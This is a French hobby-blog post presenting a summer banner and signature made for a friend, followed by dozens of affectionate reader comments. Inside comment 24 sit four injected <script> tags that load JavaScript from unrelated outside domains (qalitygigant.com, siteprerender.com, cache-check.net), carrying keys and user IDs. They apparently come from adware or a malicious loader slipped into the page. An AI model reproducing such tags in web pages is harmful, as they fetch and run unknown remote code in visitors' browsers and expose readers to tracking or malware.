• Ma Bannière pour Chipounettenet

     

     

    Il vous faudra être inscrit à mon blog et me déposer régulièrement des commentaires...Il vous faudra être inscrit à mon blog et me déposer régulièrement des commentaires...Il vous faudra être inscrit à mon blog et me déposer régulièrement des commentaires

     

     

    Ma Bannière pour Chipounettenet

     

     

    ( décliné en "c'est l'été" à Retrouver dans la Rubrique "Saisons"-"été" ICI )

     

     

    Ma Bannière pour Chipounettenet

     

     

    Chipounette m'a demandé une bannière d'été... et zut je n'ai plus sa demande mais je pense avoir respecté ce qu'elle m'avait demandé puisque ça lui a plu...

     

     

    Ma Bannière pour Chipounettenet

     

     

    Cliquez sur la bannière et le fond pour les voir en taille réelle...

     

     

     

     

    Ma Bannière pour Chipounettenet

     

     

     

     

    Voici le fond...

     

     

     

     

    Ma Bannière pour Chipounettenet

     

     

     

     

    et la signature...

     

     

     

     

    Ma Bannière pour Chipounettenet

     

     

     

    Pour visiter son blog...

     

     

    Ma Bannière pour Chipounettenet

     

     

     

     

    Ma Bannière pour Chipounettenet

     

     

    (à Retrouver dans la Rubrique "Séparations"-"Mer-Océan" ICI )

     

     

     

    Ma Bannière pour Chipounettenet

     

    (à Retrouver dans la Rubrique "Jours"-"Jeudi"-"été" ICI )

     

     

     


    Tags Tags : , , , , ,
  • Commentaires

    38
    Vendredi 23 Juillet 2021 à 18:58

    Bonjour Valie,

    Ton blog est superbe!! Bisous

    37
    Vendredi 18 Septembre 2020 à 12:15

    Coucou tes bannières sont magnifiques je ne sais pas comment faire ! Tu peut m en faire une sur l aquarelle s il te plait ? Enfin si tu a le temps bien sûr ! Bisous 

    36
    Mardi 2 Juin 2020 à 22:40
    bibikafeine

    encore de superbes créations à ton actif. bravo ! bises

    35
    Mardi 2 Juin 2020 à 11:53

    superbe cette bannière bravo 

    Gros bisous Pierrette67

    34
    Dimanche 31 Mai 2020 à 19:25

    voila une superbe signature et bannière chapeau

    bisous

    33
    Dimanche 31 Mai 2020 à 13:22

    Ma demande c'était carte blanche dans l'esprit de ce que tu as fait pour le printemps ! Consigne plus que respectée : j'ai fait la danse de la joie quand j'ai eu ton mail !! Hi hi hi !! 
    Encore bravo et MERCI
    Gros Bisous

    32
    Samedi 30 Mai 2020 à 14:10

    Bonjour Valie

    Il fait beau et c'est super mais il faut faire encore plus attention ( pas de distances pas de masques ) 

    Ton nouveau désign est superbe !!!

    Bon week-end de Pentecôte et gros bisous

    ton amie Janine

    Kalyona

    31
    Vendredi 29 Mai 2020 à 22:13

    Bonsoir Valie

    Un petit coucou pour te souhaiter une bonne soirée et un bon week-end

    gros bisous d'amitié

    Janine

    Défis de Coco

    30
    Vendredi 29 Mai 2020 à 18:26

    Magnifique ! On s'y croirait !! Bravo Valie tu es trop forte !!

    Bisous bisous !

    29
    Vendredi 29 Mai 2020 à 16:07

    rhhoooo ca sent trop les vacances 

    j'ai bien hate de partir voir d'autres horizons le 11 juillet 

     

    gros bisous valie à bientot 

    28
    Vendredi 29 Mai 2020 à 12:42

    Sa sent bon les vacances chez toi avec la bannière de Chipounette, joli ce que tu lui a concocté et je suis certaine que cela lui a beaucoup plu

    Passe un bon week-end

    Gros bisous

    27
    qinoa
    Vendredi 29 Mai 2020 à 11:23

    déjà vu sur le blog de chipounetenet et je trouve très paisible, très beau, j'adore

    bzz

    26
    Vendredi 29 Mai 2020 à 11:09

    bonjour Val tu vas bien

    c'est beau ce que tu as fais

    bon week-end gros bisous

    Elyci

    25
    Jeudi 28 Mai 2020 à 23:29

    Comme toujours tu as su répondre aux attentes de notre amie!! Bravo! Bises Nadine

    24
    mamijojo77100
    Jeudi 28 Mai 2020 à 22:30

    tu a encore cogite pour faire une heureuse. Ca sent evidemment les vacances mais attention precautions, les gens seront ils resonnables c est moins sur bonne fin de semaine  bises joelle

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1590697639599" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    23
    Jeudi 28 Mai 2020 à 21:59

    Toujours au top pour satisfaire les copinautes ; bravo.

    Bonne fin de soirée ; bisous * Nicole

     
     
    22
    Jeudi 28 Mai 2020 à 21:35
    Dane

    coucou très jolie cette bannière ça fait penser aux vacances  félicitations gros bisous a bientôt

    21
    Jeudi 28 Mai 2020 à 21:10

    Très joli bannière pour Chipounnette, bravo Valie!

    Ma Bannière pour Chipounettenet  

    Très joli en passant ma chère.

    20
    Jeudi 28 Mai 2020 à 20:02

    Bonsoir ma douce Valie

    Elle est très belle la bannière que tu as fait

    pour ton amie , ça donne envie d'aller voir la mer 

    une belle représentation de la grande bleue tu es talentueuse .

    Bonne et douce soirée et gros bisous

    Janine

    19
    Jeudi 28 Mai 2020 à 17:08

    Coucou ma Valie, elle est superbe cette bannière et je suis allée voir son blog, il est superbe. Merci pour la barre de séparation, elle est très jolie. Passe une belle fin de journée, ici encore très chaud avec 29 degrés. Gros bisous tendresse !

    18
    marianne pirotte
    Jeudi 28 Mai 2020 à 17:01

    Absolument superbe la bannière !!!

    Gros bisous

    Marianne

    17
    Jeudi 28 Mai 2020 à 15:24

    Bonjour

    superbe la bannière

    vive l'été

    Bon jeudi

    16
    Jeudi 28 Mai 2020 à 14:36

      Waouh   !!!  super  c'est  vraiment  l'été 

       bravo  !!!

       gros  bisous

     

    15
    Jacline-H-49
    Jeudi 28 Mai 2020 à 14:33

    Bannière et signature au Top !! ça donne envie d'y être et mettre les pieds dans l'eau.

    Belle performance, bravo ma Valie.

    Bon après midi à passer à ta guise.

    GROS BISOUS TENDRESSE de 

    Jacline

     

    14
    Jeudi 28 Mai 2020 à 11:10

    Huuum y'a bon les vacances, Lol !!! Super joli, Bravo ma tite Valie.

    Belle journée à toi, Mille Bisous.

    13
    Jeudi 28 Mai 2020 à 11:03

    Trop belle ta bannière pour ton amie!! Vraiment tu as du talent pour faire de ces jolies créations......

    Bisous et douce journée

    12
    Jeudi 28 Mai 2020 à 10:57

    Oui, j'ai vu sur son blog, c'est une belle bannière, tu as encore bien travaillé.
    Bonne journée.
    Bises.

    11
    Jeudi 28 Mai 2020 à 10:26

    magnifique bravo valie ! vive les vacances lol

    bisous

    10
    Jeudi 28 Mai 2020 à 10:22

    Chipounette doit-être ravie quelle jolie bannière estivale ah vivement que nous puissions profiter des grands espaces. Bonne journée Valie.

    9
    Jour de mai
    Jeudi 28 Mai 2020 à 09:52

    Coucou Valie, 

    On sent la saison estivale arrivée à grands pas, quel plaisir et tu as remarquable traduit celle-ci. 

    Bravo, ça donne l'envie de partir, allez patience, cela va bien arriver à un moment donné. 

    La signature est également très joli, comme tout ce que tu fais d'ailleurs. 

    Chipounette semble ravie. 

    Alors bon jeudi en attendant de mettre ton blog en mode été. 

    Gros bisous ♥♥♥

    LN

    8
    Jeudi 28 Mai 2020 à 09:49

    ça sent bon l'été, bravo Valie ! bisous bonne journée

    7
    Jeudi 28 Mai 2020 à 09:36

    En tous cas, sa "private beach" le tente bien ! C'est totalement ravissant !!! 

    Bises

    Thaly

    6
    Jeannine (cristal24)
    Jeudi 28 Mai 2020 à 09:25

    Très belle bannière, comme toutes celles que tu fais.

    Bravo.

    Bonne continuation dans tes belles créations.

    Bonne journée, toujours avec le soleil.

    Bises.

    Jeannine

    5
    Jeudi 28 Mai 2020 à 09:11

    C'est bon de voir la Mer...Merci Valie de partager

    tes jolis moments.Gros bisous*

    Bonne journée de Jeudi****

    4
    Jeudi 28 Mai 2020 à 09:11

    coucou Valie

    Comme toujours , tu fais un travail remarquable . Bravo

    je te souhaite une belle journée  et une bonne fin de semaine

    demain , médecin ! je n'aurai peut être pas le temps de passer 

    gros bisous

    3
    Jeudi 28 Mai 2020 à 09:02

    Je ne sais pas si répond bien à sa demande ma chère Valie mais c est de toute beauté et ça reflète bien l été , la mer , les oiseaux de mer, tout enfin, félicitations à toi et ton amie doit etre merveilleusement heureuse, bon jeudi à toi ma douce et porte toi bien bisous tendresse

    2
    Jeudi 28 Mai 2020 à 08:49

    C'est une sympathique bannière estivale ainsi que le signature que tu as réalisées là, hum... envie de vacances !

    Gros bisous, bonne journée.

    1
    Jeudi 28 Mai 2020 à 08:39

    Bonjour ma Valie, Encore de belles créations que tu as réalisé là, c'est vraiment magnifique et ton amie va être ravie

    Je te souhaite une belle journée

    Bisous de Pat

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :